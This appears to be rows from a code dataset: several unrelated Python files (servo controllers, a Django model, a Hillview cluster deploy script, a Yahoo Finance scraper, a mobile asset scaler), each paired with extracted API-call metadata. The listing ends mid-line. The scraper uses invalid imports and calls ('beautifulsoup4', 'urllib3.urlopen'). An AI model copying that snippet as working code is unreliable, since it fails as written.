code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
import logging
import math
import time
from typing import Dict, List
from servo import Servo
class ControllerForPCA9685:
def __init__(self, servos: Dict[object, Servo], chs: Dict[object, int],
pwm_freq: float, init_angles: Dict[object, float] = None):
import Adafruit_PCA9685 as PCA9685
if list(servos.keys()).sort() != list(chs.keys()).sort():
raise ValueError
if init_angles is None:
init_angles = {k: (v.angle_min_deg + v.angle_max_deg) / 2
for k, v in servos.items()}
elif list(servos.keys()).sort() != list(init_angles.keys()).sort():
raise ValueError
self.servos = servos
self.chs = chs
self.pwm_freq = pwm_freq
self.init_angles = {k: servos[k].fix_angle(v)
for k, v in init_angles.items()}
self.current_angles = self.init_angles.copy()
PCA9685.software_reset()
self.pca9685 = PCA9685.PCA9685()
self.pca9685.set_pwm_freq(self.pwm_freq)
for k in servos:
self.pca9685.set_pwm(self.chs[k], 0, int(round(
self.servos[k].angle_to_pwm_val(self.init_angles[k]))))
time.sleep(self.servos[k].wait_time(self.servos[k].angle_max_deg))
def rotate(self, angles: Dict[object, float], is_relative: bool):
for k, angle in angles.items():
angle = self.servos[k].fix_angle(
angle + (self.current_angles[k] if is_relative else 0.0))
if math.isclose(self.current_angles[k], angle):
continue
angle_diff = abs(self.current_angles[k] - angle)
logging.info("Controller: rotating %s from %f to %f",
k, self.current_angles[k], angle)
self.pca9685.set_pwm(self.chs[k], 0, int(round(
self.servos[k].angle_to_pwm_val(angle))))
time.sleep(self.servos[k].wait_time(angle_diff))
self.current_angles[k] = angle
class ControllerForRPi:
def __init__(self, servos: Dict[object, Servo], pins: Dict[object, int],
init_angles: Dict[object, float] = None):
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD)
if list(servos.keys()).sort() != list(pins.keys()).sort():
raise ValueError
if init_angles is None:
init_angles = {k: (v.angle_min_deg + v.angle_max_deg) / 2
for k, v in servos.items()}
elif list(servos.keys()).sort() != list(init_angles.keys()).sort():
raise ValueError
self.servos = servos
self.pins = pins
self.active_servos = set()
self.init_angles = {k: servos[k].fix_angle(v)
for k, v in init_angles.items()}
self.current_angles = self.init_angles.copy()
self.pwms = {}
self.gpio = GPIO
for k in servos:
self.gpio.setup(self.pins[k], GPIO.OUT)
self.pwms[k] = self.gpio.PWM(pins[k], servos[k].pwm_freq)
logging.info("Controller: initialized, set pins %s", pins)
def __del__(self):
self.gpio.cleanup()
logging.info("Controller: deleted")
def start(self, servos_key: List[object]):
started = set()
for k in servos_key:
if k in self.servos and not (k in self.active_servos):
init_duty_cycle \
= self.servos[k].angle_to_pwm_val(self.init_angles[k])
self.pwms[k].start(init_duty_cycle)
time.sleep(
self.servos[k].wait_time(self.servos[k].angle_max_deg))
self.active_servos.add(k)
started.add(k)
if len(started) > 0:
logging.info("Controller: started %s", started)
def stop(self, servos_key: List[object]):
stopped = set()
for k in servos_key:
if k in self.servos and k in self.active_servos:
self.pwms[k].stop()
self.active_servos.remove(k)
stopped.add(k)
if len(stopped) > 0:
logging.info("Controller: stopped %s", stopped)
def rotate(self, angles: Dict[object, float], is_relative: bool):
for k, angle in angles.items():
if not (k in self.active_servos):
continue
angle = self.servos[k].fix_angle(
angle + (self.current_angles[k] if is_relative else 0.0))
if math.isclose(self.current_angles[k], angle):
continue
angle_diff = abs(self.current_angles[k] - angle)
logging.info("Controller: rotating %s from %f to %f",
k, self.current_angles[k], angle)
self.pwms[k].ChangeDutyCycle(
self.servos[k].angle_to_pwm_val(angle))
time.sleep(self.servos[k].wait_time(angle_diff))
self.pwms[k].ChangeDutyCycle(0.0)
self.current_angles[k] = angle
| [
"math.isclose",
"Adafruit_PCA9685.software_reset",
"Adafruit_PCA9685.PCA9685",
"logging.info",
"RPi.GPIO.setmode"
] | [((965, 989), 'Adafruit_PCA9685.software_reset', 'PCA9685.software_reset', ([], {}), '()\n', (987, 989), True, 'import Adafruit_PCA9685 as PCA9685\n'), ((1013, 1030), 'Adafruit_PCA9685.PCA9685', 'PCA9685.PCA9685', ([], {}), '()\n', (1028, 1030), True, 'import Adafruit_PCA9685 as PCA9685\n'), ((2259, 2283), 'RPi.GPIO.setmode', 'GPIO.setmode', (['GPIO.BOARD'], {}), '(GPIO.BOARD)\n', (2271, 2283), True, 'import RPi.GPIO as GPIO\n'), ((3139, 3197), 'logging.info', 'logging.info', (['"""Controller: initialized, set pins %s"""', 'pins'], {}), "('Controller: initialized, set pins %s', pins)\n", (3151, 3197), False, 'import logging\n'), ((3262, 3297), 'logging.info', 'logging.info', (['"""Controller: deleted"""'], {}), "('Controller: deleted')\n", (3274, 3297), False, 'import logging\n'), ((1566, 1609), 'math.isclose', 'math.isclose', (['self.current_angles[k]', 'angle'], {}), '(self.current_angles[k], angle)\n', (1578, 1609), False, 'import math\n'), ((1722, 1814), 'logging.info', 'logging.info', (['"""Controller: rotating %s from %f to %f"""', 'k', 'self.current_angles[k]', 'angle'], {}), "('Controller: rotating %s from %f to %f', k, self.\n current_angles[k], angle)\n", (1734, 1814), False, 'import logging\n'), ((3849, 3896), 'logging.info', 'logging.info', (['"""Controller: started %s"""', 'started'], {}), "('Controller: started %s', started)\n", (3861, 3896), False, 'import logging\n'), ((4215, 4262), 'logging.info', 'logging.info', (['"""Controller: stopped %s"""', 'stopped'], {}), "('Controller: stopped %s', stopped)\n", (4227, 4262), False, 'import logging\n'), ((4597, 4640), 'math.isclose', 'math.isclose', (['self.current_angles[k]', 'angle'], {}), '(self.current_angles[k], angle)\n', (4609, 4640), False, 'import math\n'), ((4753, 4845), 'logging.info', 'logging.info', (['"""Controller: rotating %s from %f to %f"""', 'k', 'self.current_angles[k]', 'angle'], {}), "('Controller: rotating %s from %f to %f', k, self.\n current_angles[k], angle)\n", (4765, 4845), False, 'import logging\n')] |
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here.
class Neighbor(models.Model) :
n_name = models.CharField(max_length=35)
n_location = models.CharField(max_length=35)
n_image = models.ImageField(upload_to='n_posts/')
n_title = models.CharField(max_length=100)
n_post = models.TextField()
n_author = models.ForeignKey(User, on_delete=models.CASCADE)
n_date_posted = models.DateTimeField(default=timezone.now)
def __str__(self) :
return self.n_title
class Meta :
ordering = ['n_date_posted'] | [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((180, 211), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(35)'}), '(max_length=35)\n', (196, 211), False, 'from django.db import models\n'), ((227, 258), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(35)'}), '(max_length=35)\n', (243, 258), False, 'from django.db import models\n'), ((271, 310), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""n_posts/"""'}), "(upload_to='n_posts/')\n", (288, 310), False, 'from django.db import models\n'), ((323, 355), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (339, 355), False, 'from django.db import models\n'), ((367, 385), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (383, 385), False, 'from django.db import models\n'), ((399, 448), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (416, 448), False, 'from django.db import models\n'), ((467, 509), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (487, 509), False, 'from django.db import models\n')] |
#!/usr/bin/env python3
"""This python program deploys the files needed by the Hillview service
on the machines specified in the configuration file."""
# pylint: disable=invalid-name
from argparse import ArgumentParser
import tempfile
import os.path
from hillviewCommon import ClusterConfiguration, get_config, get_logger
logger = get_logger("deploy")
def generate_script(config, rh, template):
"""Generates a shell script based on a template inserting configuration variables"""
logger.info("Generating script for host " + rh.host + " from " + template)
variables = ""
variables += "SERVICE_DIRECTORY=" + config.service_folder + "\n"
variables += "HEAPSIZE=\"" + rh.heapsize + "\"\n"
variables += "USER=" + rh.user + "\n"
variables += "WORKER_PORT=" + str(config.worker_port) + "\n"
variables += "AGGREGATOR_PORT=" + str(config.aggregator_port) + "\n"
variables += "CLEANUP=" + str(1 if config.cleanup_on_install() else 0) + "\n"
variables += "TOMCAT=" + config.tomcat + "\n"
lines = list(open(template))
filename = template.replace("-template", "")
lines = [variables if "REPLACE_WITH_VARIABLES" in x else x for x in lines]
with open(filename, "w") as f:
f.write("# Automatically generated from " + template)
for l in lines:
f.write(l)
os.chmod(filename, 0o770)
def prepare_webserver(config):
"""Deploys files needed by the Hillview web server"""
logger.info("Creating web service folder")
assert isinstance(config, ClusterConfiguration)
rh = config.get_webserver()
message = "Preparing web server " + str(rh)
logger.info(message)
rh.create_remote_folder(config.service_folder)
rh.create_remote_folder(config.service_folder + "/bookmark")
rh.run_remote_shell_command("chown " + config.get_user() + " " + config.service_folder)
major = config.tomcat_version[0:config.tomcat_version.find('.')]
installTomcat = "cd " + config.service_folder + ";" + \
"if [ ! -d " + config.tomcat + " ]; then " + \
"wget http://archive.apache.org/dist/tomcat/tomcat-" + major + "/v" + \
config.tomcat_version + "/bin/" + config.tomcat + ".tar.gz;" + \
"tar xvfz " + config.tomcat + ".tar.gz;" + \
"rm -f " + config.tomcat + ".tar.gz; fi"
tomcatFolder = config.service_folder + "/" + config.tomcat
rh.run_remote_shell_command(installTomcat)
rh.run_remote_shell_command("rm -rf " + tomcatFolder + "/webapps/ROOT")
rh.copy_file_to_remote(
config.scriptFolder +
"/../web/target/web-1.0-SNAPSHOT.war",
tomcatFolder + "/webapps/ROOT.war", "")
tmp = tempfile.NamedTemporaryFile(mode="w", delete=False)
agg = config.get_aggregators()
if agg:
for a in agg:
tmp.write(a.host + ":" + str(config.aggregator_port) + "\n")
else:
for h in config.get_workers():
tmp.write(h.host + ":" + str(config.worker_port) + "\n")
tmp.close()
rh.copy_file_to_remote(tmp.name, config.service_folder + "/serverlist", "")
os.unlink(tmp.name)
generate_script(config, rh, "hillview-webserver-manager-template.sh")
rh.copy_file_to_remote(
"hillview-webserver-manager.sh", config.service_folder, "")
os.unlink("hillview-webserver-manager.sh")
def create_service_folder(config, rh):
assert isinstance(config, ClusterConfiguration)
rh.create_remote_folder(config.service_folder)
rh.run_remote_shell_command("chown " + config.get_user() + " " + config.service_folder)
rh.create_remote_folder(config.service_folder + "/hillview")
def prepare_worker(config, rh):
"""Prepares files needed by a Hillview worker on a remote machine"""
assert isinstance(config, ClusterConfiguration)
message = "Preparing worker " + str(rh)
logger.info(message)
create_service_folder(config, rh)
rh.copy_file_to_remote(
config.scriptFolder +
"/../platform/target/hillview-server-jar-with-dependencies.jar",
config.service_folder, "")
generate_script(config, rh, "hillview-worker-manager-template.sh")
rh.copy_file_to_remote(
"hillview-worker-manager.sh", config.service_folder, "")
rh.copy_file_to_remote("forever.sh", config.service_folder, "")
os.unlink("hillview-worker-manager.sh")
def prepare_aggregator(config, rh):
"""Prepares files needed by a Hillview aggregator on a remote machine"""
assert isinstance(config, ClusterConfiguration)
message = "Preparing aggregator " + str(rh)
logger.info(message)
# Check if the aggregator machine is also a worker machine; if so, skip
# some deployment
isWorker = False
for a in config.get_workers():
if rh.host == a.host:
isWorker = True
break
if not isWorker:
create_service_folder(config, rh)
rh.copy_file_to_remote(
config.scriptFolder +
"/../platform/target/hillview-server-jar-with-dependencies.jar",
config.service_folder + "/hillview", "")
tmp = tempfile.NamedTemporaryFile(mode="w", delete=False)
for h in rh.children:
tmp.write(h + ":" + str(config.worker_port) + "\n")
tmp.close()
rh.copy_file_to_remote(tmp.name, config.service_folder + "/workers", "")
os.unlink(tmp.name)
generate_script(config, rh, "hillview-aggregator-manager-template.sh")
rh.copy_file_to_remote(
"hillview-aggregator-manager.sh", config.service_folder, "")
os.unlink("hillview-aggregator-manager.sh")
def prepare_workers(config):
"""Prepares all Hillview workers"""
assert isinstance(config, ClusterConfiguration)
config.run_on_all_workers(lambda rh: prepare_worker(config, rh))
def prepare_aggregators(config):
"""Prepares all Hillview aggregators"""
assert isinstance(config, ClusterConfiguration)
config.run_on_all_aggregators(lambda rh: prepare_aggregator(config, rh))
def main():
"""Main function"""
parser = ArgumentParser()
parser.add_argument("config", help="json cluster configuration file")
args = parser.parse_args()
config = get_config(parser, args)
prepare_webserver(config)
prepare_aggregators(config)
prepare_workers(config)
if __name__ == "__main__":
main()
| [
"hillviewCommon.get_logger",
"hillviewCommon.get_config",
"argparse.ArgumentParser",
"tempfile.NamedTemporaryFile"
] | [((336, 356), 'hillviewCommon.get_logger', 'get_logger', (['"""deploy"""'], {}), "('deploy')\n", (346, 356), False, 'from hillviewCommon import ClusterConfiguration, get_config, get_logger\n'), ((2641, 2692), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (2668, 2692), False, 'import tempfile\n'), ((5036, 5087), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (5063, 5087), False, 'import tempfile\n'), ((5960, 5976), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (5974, 5976), False, 'from argparse import ArgumentParser\n'), ((6095, 6119), 'hillviewCommon.get_config', 'get_config', (['parser', 'args'], {}), '(parser, args)\n', (6105, 6119), False, 'from hillviewCommon import ClusterConfiguration, get_config, get_logger\n')] |
import urllib3
from beautifulsoup4 import beautifulsoup4 as bs
def get_historical_data(name, number_of_days):
data = []
url = "https://finance.yahoo.com/quote/" + name + "/history/"
rows = bs(urllib3.urlopen(url).read()).findAll('table')[0].tbody.findAll('tr')
for each_row in rows:
divs = each_row.findAll('td')
if divs[1].span.text != 'Dividend': #Ignore this row in the table
#I'm only interested in 'Open' price; For other values, play with divs[1 - 5]
data.append({'Date': divs[0].span.text, 'Open': float(divs[1].span.text.replace(',',''))})
return data[:number_of_days]
#Test
# print get_historical_data('amzn', 15)
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=1561874153&period2=1593496553&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=1561874369&period2=1593496769&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/AMZN?period1=1561874338&period2=1593496738&interval=1d&events=history
# max
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=76204800&period2=1593388800&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/VBIV?period1=1031097600&period2=1593388800&interval=1d&events=history | [
"urllib3.urlopen"
] | [((196, 216), 'urllib3.urlopen', 'urllib3.urlopen', (['url'], {}), '(url)\n', (211, 216), False, 'import urllib3\n')] |
#!/usr/bin/python
import os, glob, hashlib, pickle, argparse, shutil, ntpath
import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys
from multiprocessing import Pool
from functools import partial
######################### Classes ##############################
class AndroidDensity:
def __init__(self, name, path, scaleFactor):
self.name = name
self.path = path
self.scaleFactor = scaleFactor
class IosDensity:
def __init__(self, name, suffix, scaleFactor):
self.name = name
self.suffix = suffix
self.scaleFactor = scaleFactor
class Colors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
################################################################
################# Directories configuration ####################
dirRoot = "./"
dirRaw = dirRoot + "raw/"
dirAssets = dirRoot + "drawables/"
# ScaleFactor with origin in XXXHDPI density. Source: http://jennift.com/dpical.html
androidDensities = [
AndroidDensity("HDPI", "drawable-hdpi/", 0.375),
AndroidDensity("X-HDPI", "drawable-xhdpi/", 0.5),
AndroidDensity("XX-HDPI", "drawable-xxhdpi/", 0.75),
AndroidDensity("XXX-HDPI", "drawable-xxxhdpi/", 1.0)
]
# ScaleFactor with origin in @3X density.
iosDensities = [
IosDensity("@1X", "", 0.333333),
IosDensity("@2X", "@2X", 0.666666),
IosDensity("@3X", "@3X", 1.0)
]
################################################################
# Constants
STORAGE_FILE_NAME = ".warp_storage"
TARGET_ANDROID = "android"
TARGET_IOS = "ios"
# Variables with default values
poolThreads = multiprocessing.cpu_count() + 1
upToDateFiles = []
deletedFiles = []
newFiles = []
modifiedFiles = []
targetPlatform = ""
shouldCleanProject = False
shouldRunSilently = False
versionName = "1.0.1"
# Script entry point
def main():
parseCommandLineOptions()
greet()
setUpPathVariables()
if shouldCleanProject or shouldForceCleanProject:
cleanProject()
else:
makeRequiredDirectories()
classifyRawFiles(upToDateFiles, deletedFiles, newFiles, modifiedFiles)
processUpToDateAssets(upToDateFiles)
processNewAssets(newFiles)
processModifiedAssets(modifiedFiles)
processDeletedAssets(deletedFiles)
goodbye()
# Parse command line options and store them in variables
def parseCommandLineOptions():
parser = argparse.ArgumentParser(description="Seamless mobile assets management")
baseGroup = parser.add_argument_group('Basic usage')
baseGroup.add_argument("-t", "--target",
dest="target",
required=True,
choices=[TARGET_ANDROID, TARGET_IOS],
help="specifies the platform where the assets will be used",
metavar=TARGET_ANDROID +"/" + TARGET_IOS)
baseGroup.add_argument("-i", "--input",
dest="input",
help="directory where the raw assets are located",
metavar="\"raw/assets/path\"")
baseGroup.add_argument("-o", "--output",
dest="output",
help="directory where the processed assets will be placed",
metavar="\"proccesed/assets/path\"")
baseGroup.add_argument("-v", "--version",
action='version',
version='%(prog)s ' + versionName)
baseGroup.add_argument("-T", "--threads",
dest="threads",
help="number of threads to use while processing the assets",
metavar="N",
default=multiprocessing.cpu_count() + 1,
type=int)
buildGroup = parser.add_argument_group('Processing options')
buildGroup.add_argument("-c", "--clean",
action="store_true",
default=False,
dest="clean",
help="remove every generated asset")
buildGroup.add_argument("-f", "--force-clean",
action="store_true",
default=False,
dest="force_clean",
help="forces the removal of the output folder")
uiGroup = parser.add_argument_group('UI')
uiGroup.add_argument("-s", "--silent",
action="store_true",
default=False,
dest="silent",
help="doesn't show the welcome message")
# Save parsed options as global variables
global targetPlatform
global dirRaw
global dirAssets
global shouldCleanProject
global shouldForceCleanProject
global shouldRunSilently
global poolThreads
args = parser.parse_args()
targetPlatform = args.target
if args.input: dirRaw = args.input
if args.output: dirAssets = args.output
shouldCleanProject = args.clean
shouldForceCleanProject = args.force_clean
shouldRunSilently = args.silent
poolThreads = args.threads if args.threads > 0 else 1
# Greet
def greet():
logo = [
" ",
" **********************************",
" * _ _____ ____ ____ *",
" * | | / / | / __ \/ __ \\ *",
" * | | /| / / /| | / /_/ / /_/ / *",
" * | |/ |/ / ___ |/ _, _/ ____/ *",
" * |__/|__/_/ |_/_/ |_/_/ *",
" * *",
" * Wolox Assets Rapid Processor *",
" **********************************",
" v."+ versionName +" ",
" "
]
if not shouldRunSilently:
for line in logo:
print(Colors.PURPLE + line + Colors.ENDC)
# Adds neccesary PATH variables. Useful when running the script from a non
# user shell (like with Gradle in Android)
def setUpPathVariables():
os.environ['PATH'] = os.environ['PATH'] + ":/usr/local/bin"
# Clears previously processed assets and the hash storage file
def cleanProject():
print(Colors.YELLOW + "Cleaning previously processed assets..." + Colors.ENDC)
# Dictionary of previously hashed files: <file path, MD5 hash>
storedHashedFiles = loadHashedFiles()
# Delete all the stored files
for path, md5 in storedHashedFiles.iteritems():
assetToClean = ntpath.basename(path)
print(Colors.BLUE + "DELETING ASSET: " + assetToClean + Colors.ENDC)
deleteAsset(assetToClean)
# Remove generated density folders if empty
for density in androidDensities:
densityDir = dirAssets + density.path
if os.path.exists(densityDir) and (os.listdir(densityDir) == [] or shouldForceCleanProject) :
print(Colors.BLUE + "DELETING ASSET DIRECTORY: " + densityDir + Colors.ENDC)
if shouldForceCleanProject:
shutil.rmtree(densityDir)
else :
os.rmdir(densityDir)
# Remove assets output folder if empty
if os.path.exists(dirAssets) and os.listdir(dirAssets) == [] :
print(Colors.BLUE + "DELETING EMPTY OUTPUT DIRECTORY: " + dirAssets + Colors.ENDC)
os.rmdir(dirAssets)
# Remove storage file
if os.path.exists(dirRaw + STORAGE_FILE_NAME):
os.remove(dirRaw + STORAGE_FILE_NAME)
print(Colors.YELLOW + "Assets cleared" + Colors.ENDC)
# Make the required directories to process asssets if they doesn't exist already
def makeRequiredDirectories():
# Make raw directory if needed
if not os.path.exists(dirRaw):
print("Making directory for raw assets: " + dirRaw)
os.makedirs(dirRaw)
# Make directories for Android processed assets
if targetPlatform == TARGET_ANDROID:
for density in androidDensities:
if not os.path.exists(dirAssets + density.path):
print("Making directory for Android assets: " + dirAssets + density.path)
os.makedirs(dirAssets + density.path)
# Make directories for iOS processed assets
else:
if not os.path.exists(dirAssets):
print("Making directory for iOS assets:" + dirAssets)
os.makedirs(dirAssets)
# Classify raw files into collections of up to date, deleted, new and modified files
def classifyRawFiles(upToDateFiles, deletedFiles, newFiles, modifiedFiles):
# Dictionary of previously hashed files: <file path, MD5 hash>
storedHashedFiles = loadHashedFiles()
# Dictionary of newly hashed files and ready to compare for diff: <file path, MD5 hash>
recentlyHashedFiles = hashRawFiles()
saveHashedFiles(recentlyHashedFiles)
# Classify files by comparing recent hashes with previously hased files
for path, md5 in recentlyHashedFiles.iteritems():
if path in storedHashedFiles:
# CASE 1: The file is present and the hashes are the same (the file is the same)
if md5 == recentlyHashedFiles[path]:
upToDateFiles.append(path)
# CASE 2: The file is present, but the hashes doesn't match (the file has been modified)
else:
modifiedFiles.append(path)
del storedHashedFiles[path] # Removed the processed entry
# CASE 3: The file isn't present on the previous hash dictionary, it must be a new file
else:
newFiles.append(path)
# The leftovers in the previous hash dictionary must be the deleted files
for path in storedHashedFiles:
deletedFiles.append(path)
# Hash (MD5) files in the raw directory and return them as a dictionary <file path, MD5 hash>
def hashRawFiles():
BLOCKSIZE = 65536
hashedFiles = {}
# Hash files in the raw directory
for filePath in glob.glob(dirRaw + "*.png"):
hasher = hashlib.md5()
with open(filePath, 'rb') as fileToHash:
buf = fileToHash.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = fileToHash.read(BLOCKSIZE)
hashedFiles.update({filePath:hasher.hexdigest()})
return hashedFiles
# Store a dictionary of files to Hash
def saveHashedFiles(filesToHash):
with open(dirRaw + STORAGE_FILE_NAME, "wb") as hashStorage:
pickle.dump(filesToHash, hashStorage, pickle.HIGHEST_PROTOCOL)
# Retrieve a dictionary of hashed files
def loadHashedFiles():
try:
with open(dirRaw + STORAGE_FILE_NAME, "rb") as hashStorage:
return pickle.load(hashStorage)
except IOError:
return {}
# Process files that we found in a previous run by the script
def processUpToDateAssets(upToDateFiles):
for path in upToDateFiles:
print(Colors.BLUE + os.path.basename(path) + ": STATE > UP TO DATE" + Colors.ENDC)
# Execute a specific function in a pool of workers for every "argument" in mapArguments.
def mapInWorkers(function, mapArguments):
pool = Pool(poolThreads)
try:
pool.map_async(function, mapArguments).get(0xFFFF)
pool.close()
except KeyboardInterrupt:
print(Colors.RED + "Interrupted" + Colors.ENDC)
pool.terminate()
sys.exit(1)
# Process files that are new to the project
def processNewAssets(newFiles):
processNew = partial(processRawPngAssetWithTitle, "{}: STATE > NEW")
mapInWorkers(processNew, newFiles)
# Process files that were modified in the project
def processModifiedAssets(modifiedFiles):
processModified = partial(processRawPngAssetWithTitle, "{}: STATE > UPDATED")
mapInWorkers(processModified, modifiedFiles)
# Process files that were deleted from the project
def processDeletedAssets(deletedFiles):
for path in deletedFiles:
assetName = os.path.basename(path)
print(Colors.BLUE + assetName + ": STATE > REMOVED" + Colors.ENDC)
deleteAsset(assetName)
# Prints the title, replacing the keyword for the path basename, scale and compress the asset for every screen density
def processRawPngAssetWithTitle(title, rawAssetPath):
print (Colors.BLUE + title.format(os.path.basename(rawAssetPath)) + Colors.ENDC)
processRawPngAsset(rawAssetPath)
# Scale and compress the asset for every screen density
def processRawPngAsset(rawAssetPath):
filename = os.path.basename(rawAssetPath)
filenameAndExtension = os.path.splitext(filename) # "example.png" -> ["example", ".png"]
# Process assets for Android (e.g: /drawable-xxhdpi/...)
if targetPlatform == TARGET_ANDROID:
for density in androidDensities:
processedAssetPath = dirAssets + density.path + filename
sendAssetToPngPipeline(rawAssetPath, density, processedAssetPath)
# Process assets for iOS (e.g: ...@3X)
else:
for density in iosDensities:
processedAssetPath = dirAssets + filenameAndExtension[0] + density.suffix + filenameAndExtension[1]
sendAssetToPngPipeline(rawAssetPath, density, processedAssetPath)
print(filename + ": Processed the asset for every screen density")
def sendAssetToPngPipeline(rawAssetPath, density, processedAssetPath):
filename = os.path.basename(rawAssetPath)
print("{0}: SCALING to {1}".format(filename, density.name))
scaleImage(rawAssetPath, density.scaleFactor, processedAssetPath)
print(filename + ": COMPRESSING for " + density.name)
compressPNG(processedAssetPath)
# Scale the asset for a given screen density using FFMPEG
def scaleImage(inputPath, scaleFactor, outputPath):
os.system("ffmpeg -loglevel error -y -i \"{0}\" -vf scale=iw*{1}:-1 \"{2}\"".format(inputPath, scaleFactor, outputPath))
# Compress a PNG asset using PNGQuant
def compressPNG(inputPath):
os.system("pngquant \"{0}\" --force --ext .png".format(inputPath))
# Remove asset in every screen density
def deleteAsset(assetName):
for density in androidDensities:
if os.path.exists(dirAssets + density.path + assetName):
os.remove(dirAssets + density.path + assetName)
print(assetName + ": DELETED asset for " + density.name)
# Goodbye
def goodbye():
print(Colors.GREEN + "WARP complete!" + Colors.ENDC)
# Main call
main()
| [
"os.path.exists",
"ntpath.basename",
"pickle.dump",
"hashlib.md5",
"argparse.ArgumentParser",
"os.makedirs",
"os.listdir",
"os.path.splitext",
"pickle.load",
"multiprocessing.cpu_count",
"shutil.rmtree",
"os.rmdir",
"functools.partial",
"multiprocessing.Pool",
"os.path.basename",
"sys.... | [((1696, 1723), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1721, 1723), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((2480, 2552), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Seamless mobile assets management"""'}), "(description='Seamless mobile assets management')\n", (2503, 2552), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6792, 6834), 'os.path.exists', 'os.path.exists', (['(dirRaw + STORAGE_FILE_NAME)'], {}), '(dirRaw + STORAGE_FILE_NAME)\n', (6806, 6834), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9296, 9323), 'glob.glob', 'glob.glob', (["(dirRaw + '*.png')"], {}), "(dirRaw + '*.png')\n", (9305, 9323), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10448, 10465), 'multiprocessing.Pool', 'Pool', (['poolThreads'], {}), '(poolThreads)\n', (10452, 10465), False, 'from multiprocessing import Pool\n'), ((10781, 10836), 'functools.partial', 'partial', (['processRawPngAssetWithTitle', '"""{}: STATE > NEW"""'], {}), "(processRawPngAssetWithTitle, '{}: STATE > NEW')\n", (10788, 10836), False, 'from functools import partial\n'), ((10991, 11050), 'functools.partial', 'partial', (['processRawPngAssetWithTitle', '"""{}: STATE > UPDATED"""'], {}), "(processRawPngAssetWithTitle, '{}: STATE > UPDATED')\n", (10998, 11050), False, 'from functools import partial\n'), ((11777, 11807), 'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (11793, 11807), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11835, 11861), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (11851, 11861), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((12632, 12662), 'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (12648, 12662), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((5934, 5955), 'ntpath.basename', 'ntpath.basename', (['path'], {}), '(path)\n', (5949, 5955), False, 'import os, glob, hashlib, pickle, argparse, shutil, ntpath\n'), ((6579, 6604), 'os.path.exists', 'os.path.exists', (['dirAssets'], {}), '(dirAssets)\n', (6593, 6604), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6738, 6757), 'os.rmdir', 'os.rmdir', (['dirAssets'], {}), '(dirAssets)\n', (6746, 6757), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6844, 6881), 'os.remove', 'os.remove', (['(dirRaw + STORAGE_FILE_NAME)'], {}), '(dirRaw + STORAGE_FILE_NAME)\n', (6853, 6881), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7100, 7122), 'os.path.exists', 'os.path.exists', (['dirRaw'], {}), '(dirRaw)\n', (7114, 7122), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7192, 7211), 'os.makedirs', 'os.makedirs', (['dirRaw'], {}), '(dirRaw)\n', (7203, 7211), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9342, 9355), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (9353, 9355), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9792, 9854), 'pickle.dump', 'pickle.dump', (['filesToHash', 'hashStorage', 'pickle.HIGHEST_PROTOCOL'], {}), '(filesToHash, hashStorage, pickle.HIGHEST_PROTOCOL)\n', (9803, 9854), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11242, 11264), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (11258, 11264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, 